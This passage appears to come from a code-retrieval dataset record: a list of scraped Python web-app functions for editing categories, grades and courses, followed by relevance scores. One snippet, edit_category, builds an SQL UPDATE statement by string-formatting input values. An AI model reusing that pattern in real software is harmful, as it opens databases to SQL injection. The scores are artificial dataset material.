CategoryAspect=aspect)\n except CategoryAspectResult.DoesNotExist: # new clean form\n aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect)\n aspect_forms.append({\n \"form\": AspectResultForm(request.POST, instance=aspect_result, prefix=\"aspect\" + str(i)),\n \"aspect\": aspect,\n })\n if category_form.is_valid() and all([form['form'].is_valid() for form in aspect_forms]):\n cat_result = category_form.save()\n # return the form with the cleaned grade, not the one with the (uncleaned) post data:\n # if files:\n # category_form = CategoryResultFormFile(instance=cat_result, prefix='catform')\n # else:\n category_form = CategoryResultForm(instance=cat_result, prefix='catform')\n for form in aspect_forms: # these forms do not need to be updated as aspect data is not cleaned.\n aspect_result = form['form'].instance\n aspect_result.CategoryResult = cat_result\n aspect_result.save()\n saved = True\n else:\n # if files:\n # category_form = CategoryResultFormFile(instance=cat_result, initial=initial, prefix='catform', disabled=cat_result.Final)\n # else:\n category_form = CategoryResultForm(instance=cat_result, prefix='catform', disabled=cat_result.Final)\n aspect_forms = []\n for i, aspect in enumerate(cat.aspects.all()):\n try:\n aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect)\n except CategoryAspectResult.DoesNotExist:\n aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect)\n aspect_forms.append({\n \"form\": AspectResultForm(instance=aspect_result, prefix=\"aspect\" + str(i), disabled=cat_result.Final),\n \"aspect\": aspect,\n })\n return render(request, \"results/wizard.html\", {\n \"step\": step,\n \"categories\": cats,\n \"category\": cat,\n \"categoryform\": category_form,\n \"aspectsforms\": aspect_forms,\n \"dstr\": dstr,\n \"pk\": pk,\n \"saved\": saved,\n \"final\": cat_result.Final,\n \"aspectlabels\": 
CategoryAspectResult.ResultOptions,\n # \"files\": files,\n 'rounding': settings.CATEGORY_GRADE_QUANTIZATION\n })\n else:\n raise PermissionDenied(\"This category does not exist.\")", "def change_votes(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk, new_votes = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n this_problem = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(this_problem.value)\r\n # problem_dict[answer][pk] points to a [hint_text, #votes] pair.\r\n problem_dict[answer][pk][1] = int(new_votes)\r\n this_problem.value = json.dumps(problem_dict)\r\n this_problem.save()", "def take_test(exam, student):\n\n student.score = exam.administer()", "def edit_category(category):\n # Verify user login. If not, redirect to login page.\n login_status = None\n if 'email' in login_session:\n login_status = True\n else:\n flash('Please log in.')\n return redirect(url_for('home'))\n if request.method == 'POST':\n # Query database with SQLAlchemy and store query as an object\n category = (session.query(Categories)\n .filter_by(name=category.replace('-', ' '))\n .one())\n # Get form fields\n edit_category_name = request.form['edit_category_name']\n # Get user's database ID\n user_db_id = (session.query(Users)\n .filter_by(email=login_session['email'])\n .one()).id\n # Get database ID of category creator\n creator_db_id = category.creator_db_id\n print(\"Current user's database primary key id is {}.\"\n .format(user_db_id))\n print(\"Category creator's database primary key id is {}.\"\n .format(creator_db_id))\n print('Category to edit is \"{}\".'.format(category.name))\n # Only allow creator to edit. If not, redirect to login.\n if user_db_id != creator_db_id:\n flash('Only the creator can edit. 
Please log in as creator.')\n return redirect(url_for('home'))\n # Flash messages for incomplete item info\n if not request.form['edit_category_name']:\n flash('Please identify category.')\n return redirect(url_for('edit_category'))\n # Overwrite object with new info for database\n category.name = edit_category_name\n print('Category name for database is \"{}\".'.format(category.name))\n session.add(category)\n session.commit()\n # Return to homepage\n return redirect(url_for('home'))\n else:\n # Render webpage\n return render_template('edit_category.html',\n category_name=category,\n login_status=login_status)", "def edit(self, *args, **kw):\n\t\t\ttmpl_context.widget = self.edit_form\n\t\t\tpks \t\t= self.provider.get_primary_fields(self.model)\n\t\t\tkw \t\t\t= {}\n\n\t\t\tfor i, pk in enumerate(pks):\n\t\t\t\tkw[pk] \t\t= args[i]\n\n\t\t\tvalue \t\t= self.edit_filler.get_value(kw)\n\t\t\tvalue['_method'] \t= 'PUT'\n\n\t\t\treturn dict(value = value, model = self.model.__name__, pk_count = len(pks))", "def test_update_category(self):\n pass", "def update(request):\n\tcourse_id = request.GET.get('course_id')\n\tif request.method == 'POST':\n\t\tcourse_title = request.POST['course_title']\n\t\tinstitute_name = request.POST['institute_name']\n\t\tcourse_desc = request.POST['course_desc']\n\t\tcurrent_data = Course.objects.get(course_id = course_id)\n\t\tcurrent_data.course_title = course_title\n\t\tcurrent_data.institute_name = institute_name\n\t\tcurrent_data.course_desc = course_desc\n\t\tcurrent_data.save()\n\t\treturn HttpResponseRedirect(reverse('courseapp:index'))\n\tdata = Course.objects.get(course_id = course_id)\n\treturn render(request,'update.html',{'data':data})", "def test_superuser_edit_assessment(self):\n req, resp = data.assessment_02_request, data.assessment_02_response\n resp['contract'] = self.contract['id']\n\n response = self.superuser.put(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def modificarcategoria(self, categoria):\n self.categoria=categoria", "def edit_change_plan_actio(\r\n self, original_step: int, change_plan_action: ChangePlanAction\r\n ) -> None:\r\n try:\r\n conditions = []\r\n conditions.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions.append(ChangePlanActionEntry.step == original_step)\r\n conditions.append(ChangePlanActionEntry.action != Constants.COLLATERAL_KEY)\r\n\r\n old_entry: ChangePlanActionEntry = ChangePlanActionEntry.query.filter(\r\n and_(*conditions)\r\n ).first()\r\n\r\n # Deleting old colateral conditions\r\n conditions_colat = []\r\n conditions_colat.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions_colat.append(ChangePlanActionEntry.step == original_step)\r\n conditions_colat.append(\r\n ChangePlanActionEntry.action == Constants.COLLATERAL_KEY\r\n )\r\n\r\n ChangePlanActionEntry.query.filter(and_(*conditions_colat)).delete()\r\n\r\n # Edit sequence of actions if order changes\r\n if original_step != change_plan_action.step:\r\n self._edit_change_plan_sequence(\r\n change_plan_action.change_plan_id,\r\n original_step,\r\n change_plan_action.step,\r\n )\r\n\r\n old_entry.step = change_plan_action.step\r\n old_entry.action = change_plan_action.action\r\n old_entry.original_asset_number = change_plan_action.original_asset_number\r\n 
old_entry.new_record = change_plan_action.new_record\r\n\r\n db.session.commit()\r\n except:\r\n print(\r\n f\"Failed to update change plan action on asset {change_plan_action.original_asset_number}\"\r\n )", "def test_update_preferences_by_category(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def editCategory(category_id):\n\n if 'username' not in login_session:\n return redirect('/login')\n\n editedCategory = session.query(Category).filter_by(id=category_id).one()\n if editedCategory.user_id != login_session['user_id']:\n flash('You are not the creator of %s category, and cannot modify it' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n if request.method == 'POST':\n if \"btn_edit\" in request.form:\n if request.form['name']:\n editedCategory.name = request.form['name']\n flash('Category Successfully Edited %s' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return render_template('editCategory.html',\n category=editedCategory,\n user=getUserInfo(login_session['user_id']))", "def assignment_grade(id, session_id, course_id):\n\n user_id = session.get('user_id')\n\n con = db.get_db()\n cur = con.cursor()\n cur.execute(\"\"\"SELECT DISTINCT(ROUND(grades.points_received / grades.total_points, 2) * 100) as assignment_grade,\n grades.total_points as total, grades.points_received as earned,\n grades.submission as submission, grades.feedback as feedback,\n grades.student_id, grades.assignment_id as assign_id, assignments.name as assign_name,\n assignments.description as description,\n grades.grade_id, roster.session_id as class_session, courses.name as name\n\t FROM courses JOIN sessions on courses.course_id=sessions.id\n\t JOIN assignments on assignments.session_id=sessions.id\n JOIN grades on grades.assignment_id=assignments.assignment_id\n JOIN roster on roster.session_id=sessions.id\n WHERE grades.assignment_id= %s\n AND grades.student_id= %s\"\"\",\n (id, user_id))\n\n grade = cur.fetchone()\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/assignment_grade.html\", course_id=course_id, session_id=session_id, id=id, grade=grade)", "def edit():", "def test_update_category(self):\n category = sample_category()\n url = category_details_url(category.id)\n self.client.put(url, {\"name\": \"school\"})\n category.refresh_from_db()\n self.assertEqual(category.name, 'school')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def updateEMPStudy(self, study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, \n portal_type, study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries):\n con = self.getMetadataDatabaseConnection()\n results = con.cursor().callproc('qiime_assets.emp_study_update', \n [study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, portal_type, \n study_title, study_alias, pmid, study_abstract, 
study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries])", "def _editClickedSlot(self):\r\n\r\n index = self.propertiesTableView.selectionModel().currentIndex()\r\n if index.isValid():\r\n self.propertiesTableView.edit(index)", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def put(self, request, pk):\n data = request.data\n data.pop('skills')\n Department_name = data.pop('department')\n department = Department.objects.get(name=Department_name)\n manager_name = data.pop('manager')\n manager = Manager.objects.get(name=manager_name)\n EmployeeDetail.objects.filter(pk=pk).update(department=department, manager=manager, **data)\n return Response(\n data=\"request.data\"\n )", "def update_category_item(catalog_item_id):\n edited_item = session.query(CatalogItem). 
\\\n filter_by(id=catalog_item_id).one()\n if request.form['name']:\n edited_item.name = request.form['name']\n if request.form['description']:\n edited_item.description = request.form['description']\n if request.form['price']:\n edited_item.price = request.form['price']\n session.add(edited_item)\n session.commit()", "def put(self, request, pk):\n return self.post(request, pk)", "def edit(self, *args, **kw):\n tmpl_context.widget = self.edit_form\n #pks = self.provider.get_primary_fields(self.model)\n \n log.debug(\"soyRomperLB= %s\" %kw)\n\n ###########################################\n pks = self.provider.get_primary_fields(self.model)\n \n ###########################################\n kw = {}\n for i, pk in enumerate(pks):\n kw[pk] = args[i]\n value = self.edit_filler.get_value(kw)\n value['_method'] = 'PUT'\n return dict(value=value, model=self.model.__name__, pk_count=len(pks))", "def approve(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n # Can be optimized - sort the delete list by problem_id, and load each problem\r\n # from the database only once.\r\n problem_in_mod = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_mod.value)\r\n hint_to_move = problem_dict[answer][pk]\r\n del problem_dict[answer][pk]\r\n problem_in_mod.value = json.dumps(problem_dict)\r\n problem_in_mod.save()\r\n\r\n problem_in_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_hints.value)\r\n if answer not in problem_dict:\r\n problem_dict[answer] = {}\r\n problem_dict[answer][pk] = hint_to_move\r\n problem_in_hints.value = json.dumps(problem_dict)\r\n problem_in_hints.save()", "def editCategory(category_id):\n\n edited_category = session.query(Category).filter_by(id=category_id).first()\n if edited_category.user_id != login_session['user_id']:\n flash(\"You are authorised to Edit category created by You only!\")\n\n return redirect(url_for(\"showCatalog\"))\n\n if request.method == 'POST':\n if request.form['name'] != '':\n edited_category.name = request.form['name']\n session.add(edited_category)\n session.commit()\n flash('Category Successfully Edited %s' % edited_category.\n name)\n return redirect(url_for('showCatalog'))\n else:\n flash(\"Error editing category!\")\n return render_template('editCategory.html',\n category=edited_category)\n else:\n return render_template('editcategory.html',\n category=edited_category)", "def edit_category(self, category_id, category_name, parent_id):\n # [todo] - all parameters except category_id optional, fill others with\n # current values\n\n # [todo] - validate category_id\n # [todo] - validate new values\n\n # open a cursor\n cur = self.get_cursor()\n\n stmt = \"UPDATE categories \" + \\\n \"SET parent_id='{0}', \".format(parent_id) + \\\n \"category_name='{0}' \".format(category_name) + \\\n \"WHERE category_id={0}\".format(category_id)\n\n cur.execute(stmt)\n\n # close the cursor\n self.close_cursor()", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'lesson-edit', {'key': key}):\n return\n\n if not CourseOutlineRights.can_edit(self):\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': 
key})\n return\n\n course = courses.Course(self)\n lesson = course.find_lesson_by_id(None, key)\n if not lesson:\n transforms.send_json_response(\n self, 404, 'Object not found.', {'key': key})\n return\n\n payload = request.get('payload')\n updates_dict = transforms.json_to_dict(\n transforms.loads(payload), self.SCHEMA_DICT)\n\n lesson.title = updates_dict['title']\n lesson.unit_id = updates_dict['unit_id']\n lesson.objectives = updates_dict['objectives']\n lesson.video = updates_dict['video']\n lesson.notes = updates_dict['notes']\n lesson.activity_title = updates_dict['activity_title']\n lesson.activity_listed = updates_dict['activity_listed']\n lesson.now_available = not updates_dict['is_draft']\n\n activity = updates_dict.get('activity', '').strip()\n errors = []\n if activity:\n lesson.has_activity = True\n course.set_activity_content(lesson, activity, errors=errors)\n else:\n lesson.has_activity = False\n fs = self.app_context.fs\n path = fs.impl.physical_to_logical(course.get_activity_filename(\n lesson.unit_id, lesson.lesson_id))\n if fs.isfile(path):\n fs.delete(path)\n\n if not errors:\n assert course.update_lesson(lesson)\n course.save()\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def case_detail_update_view(request, pk):\n issue = _get_issue(request, pk)\n serializer = IssueDetailSerializer(data=request.data, instance=issue, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({\"issue\": IssueDetailSerializer(issue).data})", "def test_update_enrollment_term(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def bulk_beta_modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n action = request.GET.get('action')\r\n identifiers_raw = request.GET.get('identifiers')\r\n identifiers = _split_input_list(identifiers_raw)\r\n email_students = request.GET.get('email_students') in ['true', 'True', True]\r\n auto_enroll = request.GET.get('auto_enroll') in ['true', 'True', True]\r\n results = []\r\n rolename = 'beta'\r\n course = get_course_by_id(course_id)\r\n\r\n email_params = {}\r\n if email_students:\r\n email_params = get_email_params(course, auto_enroll=auto_enroll)\r\n\r\n for identifier in identifiers:\r\n try:\r\n error = False\r\n user_does_not_exist = False\r\n user = get_student_from_identifier(identifier)\r\n\r\n if action == 'add':\r\n allow_access(course, user, rolename)\r\n elif action == 'remove':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"Unrecognized action '{}'\".format(action)\r\n ))\r\n except User.DoesNotExist:\r\n error = True\r\n user_does_not_exist = True\r\n # catch and log any unexpected exceptions\r\n # so that one error doesn't cause a 500.\r\n except Exception as exc: # pylint: disable=broad-except\r\n log.exception(\"Error while #{}ing student\")\r\n log.exception(exc)\r\n error = True\r\n else:\r\n # If no exception thrown, see if we should send an email\r\n if email_students:\r\n send_beta_role_email(action, user, email_params)\r\n # See if we should autoenroll the student\r\n if auto_enroll:\r\n # Check if student is already enrolled\r\n if not CourseEnrollment.is_enrolled(user, course_id):\r\n CourseEnrollment.enroll(user, course_id)\r\n\r\n finally:\r\n # Tabulate the action result of this email address\r\n 
results.append({\r\n 'identifier': identifier,\r\n 'error': error,\r\n 'userDoesNotExist': user_does_not_exist\r\n })\r\n\r\n response_payload = {\r\n 'action': action,\r\n 'results': results,\r\n }\r\n return JsonResponse(response_payload)", "def get_d3_section_grade_distrib(course_id, section):\r\n\r\n # Retrieve course object down to problems\r\n course = modulestore().get_course(course_id, depth=4)\r\n\r\n problem_set = []\r\n problem_info = {}\r\n c_subsection = 0\r\n for subsection in course.get_children()[section].get_children():\r\n c_subsection += 1\r\n c_unit = 0\r\n for unit in subsection.get_children():\r\n c_unit += 1\r\n c_problem = 0\r\n for child in unit.get_children():\r\n if (child.location.category == 'problem'):\r\n c_problem += 1\r\n problem_set.append(child.location)\r\n problem_info[child.location] = {\r\n 'id': child.location.to_deprecated_string(),\r\n 'x_value': \"P{0}.{1}.{2}\".format(c_subsection, c_unit, c_problem),\r\n 'display_name': own_metadata(child).get('display_name', ''),\r\n }\r\n\r\n # Retrieve grade distribution for these problems\r\n grade_distrib = get_problem_set_grade_distrib(course_id, problem_set)\r\n\r\n d3_data = []\r\n\r\n # Construct data for each problem to be sent to d3\r\n for problem in problem_set:\r\n stack_data = []\r\n\r\n if problem in grade_distrib: # Some problems have no data because students have not tried them yet.\r\n max_grade = float(grade_distrib[problem]['max_grade'])\r\n for (grade, count_grade) in grade_distrib[problem]['grade_distrib']:\r\n percent = 0.0\r\n if max_grade > 0:\r\n percent = round((grade * 100.0) / max_grade, 1)\r\n\r\n # Construct tooltip for problem in grade distibution view\r\n tooltip = {\r\n 'type': 'problem',\r\n 'problem_info_x': problem_info[problem]['x_value'],\r\n 'count_grade': count_grade,\r\n 'percent': percent,\r\n 'problem_info_n': problem_info[problem]['display_name'],\r\n 'grade': grade,\r\n 'max_grade': max_grade,\r\n }\r\n\r\n stack_data.append({\r\n 'color': percent,\r\n 'value': count_grade,\r\n 'tooltip': tooltip,\r\n })\r\n\r\n d3_data.append({\r\n 'xValue': problem_info[problem]['x_value'],\r\n 'stackData': stack_data,\r\n })\r\n\r\n return d3_data", "def test_edit_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('Breakfast')\n self.dashboard()\n rv = self.edit_category('JunkFood')\n self.assertIn(b'Category successfully updated', rv.data)", "def test_update_risk_profile_using_put(self):\n pass", "def updateEMPStudyData(self, study_id, study_score, web_app_user_id):\n con = self.getMetadataDatabaseConnection()\n con.cursor().callproc('qiime_assets.update_emp_study_data', [study_id, study_score, web_app_user_id])" ]
[ "0.56488323", "0.5607644", "0.5588034", "0.5586747", "0.555214", "0.5505774", "0.5498233", "0.5445095", "0.52898294", "0.52345645", "0.518912", "0.51739746", "0.5155556", "0.51250327", "0.50697607", "0.50619745", "0.5057049", "0.5050862", "0.5034237", "0.5033281", "0.4990466", "0.49754292", "0.49400035", "0.49347347", "0.49288708", "0.49204296", "0.49062783", "0.48915517", "0.48847646", "0.48528203", "0.4810023", "0.47755864", "0.47561887", "0.47545376", "0.4738277", "0.47354782", "0.47333434", "0.47170523", "0.47149578", "0.47130305", "0.4712754", "0.4709302", "0.470171", "0.46999106", "0.46901187", "0.46872944", "0.46871382", "0.4683078", "0.46817937", "0.4672599", "0.4672299", "0.46718854", "0.4670794", "0.4668548", "0.46673542", "0.46631542", "0.4654718", "0.46505007", "0.46441165", "0.4638318", "0.4631399", "0.46299577", "0.46287143", "0.4619681", "0.46177602", "0.46172968", "0.46063527", "0.4603522", "0.4596664", "0.45954007", "0.458916", "0.45792332", "0.45762542", "0.45719808", "0.45708758", "0.4560271", "0.45513943", "0.45512044", "0.4549635", "0.45416316", "0.45390606", "0.45385453", "0.45321292", "0.45253447", "0.4520341", "0.45172912", "0.45130435", "0.45048884", "0.44970793", "0.44829595", "0.44824842", "0.44806945", "0.4478967", "0.447696", "0.44760814", "0.44678164", "0.44567925", "0.4450641", "0.44504103", "0.44450092", "0.4444816" ]
0.0
-1
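[Sketch] Several negatives in the record above share one pattern: delete every existing staff classification of a given subject type, then write a single high-weight replacement so staff input outranks other sources. A minimal framework-free sketch of that pattern follows; all names here (STAFF_WEIGHT, the dict fields) are assumptions for illustration, not the actual model API used in those views.

# Replace-staff-classification pattern, sketched without the ORM.
STAFF_WEIGHT = 100

def replace_staff_classification(classifications, subject_type, new_identifier):
    # Drop prior entries of this subject type (the views above do this
    # with self._db.delete(c)), then append one high-weight replacement.
    kept = [c for c in classifications if c["type"] != subject_type]
    kept.append({
        "type": subject_type,
        "identifier": new_identifier,
        "weight": STAFF_WEIGHT,  # high weight so the staff entry wins
    })
    return kept

if __name__ == "__main__":
    old = [
        {"type": "age-range", "identifier": "9-12", "weight": 1},
        {"type": "fiction-status", "identifier": "Fiction", "weight": 1},
    ]
    print(replace_staff_classification(old, "age-range", "13-17"))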
Edit the grade for a category, as indexed by step, for the student given by pk. Also edit the individual aspects of each grade category. Only track heads and responsible staff may do this.
def staff_form(request, pk, step=0): ts = get_timeslot() if not hasattr(ts, 'resultoptions'): raise PermissionDenied("Results menu is not yet visible.") else: if not get_timeslot().resultoptions.Visible: raise PermissionDenied("Results menu is not yet visible.") dstr = get_object_or_404(Distribution, pk=pk) if not hasattr(dstr, 'presentationtimeslot'): raise PermissionDenied('This student does not have a presentation planned. Please plan it first.') if not request.user.is_superuser and \ request.user != dstr.Proposal.Track.Head and \ request.user != dstr.Proposal.ResponsibleStaff and \ (get_grouptype('1') not in request.user.groups.all() or request.user not in dstr.Proposal.Assistants.all()) and \ get_grouptype('3') not in request.user.groups.all() and \ request.user not in dstr.presentationtimeslot.Presentations.Assessors.all(): raise PermissionDenied("You are not the correct owner of this distribution. " "Only track heads and responsible staff can edit grades.") cats = GradeCategory.objects.filter(TimeSlot=get_timeslot()).distinct() numcategories = len(cats) step = int(step) if step == 0: return render(request, "results/wizard.html", { "step": 0, "pk": pk, "categories": cats, "dstr": dstr, "final": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False, # fix for all([])=True # "files": files, }) elif step <= numcategories: saved = False cat = cats[step - 1] try: # existing category result cat_result = CategoryResult.objects.get(Distribution=dstr, Category=cat) initial = None except CategoryResult.DoesNotExist: # new result cat_result = CategoryResult(Distribution=dstr, Category=cat) # initial = {'Files': list(StudentFile.objects.filter(Type=cat_result.Category.File, Distribution=cat_result.Distribution).distinct())} if request.method == "POST": # submitted form if cat_result.Final: return render(request, "base.html", context={ "Message": "Category Result has already been finalized! Editing is not allowed anymore. " "If this has to be changed, contact support staff" }) # if files: # category_form = CategoryResultFormFile(request.POST, instance=cat_result, prefix='catform') # else: category_form = CategoryResultForm(request.POST, instance=cat_result, prefix='catform') aspect_forms = [] for i, aspect in enumerate(cat.aspects.all()): try: # try find existing form aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect) except CategoryAspectResult.DoesNotExist: # new clean form aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect) aspect_forms.append({ "form": AspectResultForm(request.POST, instance=aspect_result, prefix="aspect" + str(i)), "aspect": aspect, }) if category_form.is_valid() and all([form['form'].is_valid() for form in aspect_forms]): cat_result = category_form.save() # return the form with the cleaned grade, not the one with the (uncleaned) post data: # if files: # category_form = CategoryResultFormFile(instance=cat_result, prefix='catform') # else: category_form = CategoryResultForm(instance=cat_result, prefix='catform') for form in aspect_forms: # these forms do not need to be updated as aspect data is not cleaned. 
aspect_result = form['form'].instance aspect_result.CategoryResult = cat_result aspect_result.save() saved = True else: # if files: # category_form = CategoryResultFormFile(instance=cat_result, initial=initial, prefix='catform', disabled=cat_result.Final) # else: category_form = CategoryResultForm(instance=cat_result, prefix='catform', disabled=cat_result.Final) aspect_forms = [] for i, aspect in enumerate(cat.aspects.all()): try: aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect) except CategoryAspectResult.DoesNotExist: aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect) aspect_forms.append({ "form": AspectResultForm(instance=aspect_result, prefix="aspect" + str(i), disabled=cat_result.Final), "aspect": aspect, }) return render(request, "results/wizard.html", { "step": step, "categories": cats, "category": cat, "categoryform": category_form, "aspectsforms": aspect_forms, "dstr": dstr, "pk": pk, "saved": saved, "final": cat_result.Final, "aspectlabels": CategoryAspectResult.ResultOptions, # "files": files, 'rounding': settings.CATEGORY_GRADE_QUANTIZATION }) else: raise PermissionDenied("This category does not exist.")
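[Sketch] The staff_form document above drives a one-category-per-step grading wizard. Below is a minimal, framework-free sketch of its step-indexing logic, including the explicit guard against all([]) evaluating to True; every name here (CategoryResult, Distribution, wizard_step) is an assumption for illustration, not the project's actual API.

from dataclasses import dataclass, field
from typing import Optional

@dataclass
class CategoryResult:
    category: str
    grade: Optional[float] = None
    final: bool = False

@dataclass
class Distribution:
    results: list = field(default_factory=list)

def wizard_step(categories, dstr, step):
    # step 0 is the overview; steps 1..len(categories) grade one category
    # each; anything past that is rejected, as in the original view.
    if step == 0:
        # all([]) is True, so an empty result set must not read as final;
        # this mirrors the "fix for all([])=True" comment in staff_form.
        final = bool(dstr.results) and all(r.final for r in dstr.results)
        return {"step": 0, "final": final}
    if step <= len(categories):
        cat = categories[step - 1]
        # Reuse an existing result for this category or start a new one,
        # like the CategoryResult.objects.get / DoesNotExist pair above.
        result = next((r for r in dstr.results if r.category == cat), None)
        if result is None:
            result = CategoryResult(category=cat)
            dstr.results.append(result)
        if result.final:
            raise PermissionError("Category result already finalized.")
        return {"step": step, "category": cat, "result": result}
    raise PermissionError("This category does not exist.")

if __name__ == "__main__":
    d = Distribution()
    print(wizard_step(["Process", "Report"], d, 0))  # final is False, not True
    print(wizard_step(["Process", "Report"], d, 2))  # grades "Report"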
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_course_enrollment(self, student_id, course_id, course_section_id, term):\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n UPDATE course_enrollments\n SET course_id = ?, course_section_id = ?\n WHERE student_id = ?\n (?,?,?)\"\"\",\n (course_id, course_section_id, student_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1", "def edit_grade(self, username: str, token: str, course_abbreviation: str, student_id: str, updated_grade: float) -> bool:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get the student's UID\n student_uid = self.get_uid(username=student_id)\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Run update in the DB\n cursor.execute('''\n UPDATE enrollment_records SET grade = ? WHERE uid = ? AND course_id = ?\n ''', (updated_grade, student_uid, course_id))\n self._db_connection.commit()\n\n return True", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self", "def eval_evalassignment(request, pk, pts):\n student = request.user.student\n evalassignment = Evalassignment.objects.\\\n filter(pk=pk, assignment__student=student).first()\n if evalassignment:\n evalassignment.grade_evaluation = pts\n evalassignment.save()\n redirect_item = '#assignment%s' % evalassignment.assignment.id\n else:\n redirect_item = ''\n return redirect('/dashboard_student/' + redirect_item)", "def edit_course(self, course):\n EDIT_COURSE = \"\"\"UPDATE Course SET subject_code = %s, credit_hours = %s, description = %s WHERE name = %s\"\"\"\n\n self.db_cursor.execute(EDIT_COURSE, (\n course.subject_code, course.credit_hours, course.description, course.name))\n self.db_connection.commit()\n\n DELETE_COURSE_TOPICS = \"\"\"DELETE FROM CourseTopics WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_TOPICS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_TOPICS = \"\"\"INSERT INTO CourseTopics (course_name, topic_id) VALUES (%s, %s)\"\"\"\n for ct in course.topics:\n self.db_cursor.execute(INSERT_COURSE_TOPICS, (course.name,ct))\n self.db_connection.commit()\n\n DELETE_COURSE_GOALS = \"\"\"DELETE FROM CourseGoals WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_GOALS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_GOALS = \"\"\"INSERT INTO CourseGoals (course_name, goal_id) VALUES (%s, %s)\"\"\"\n for 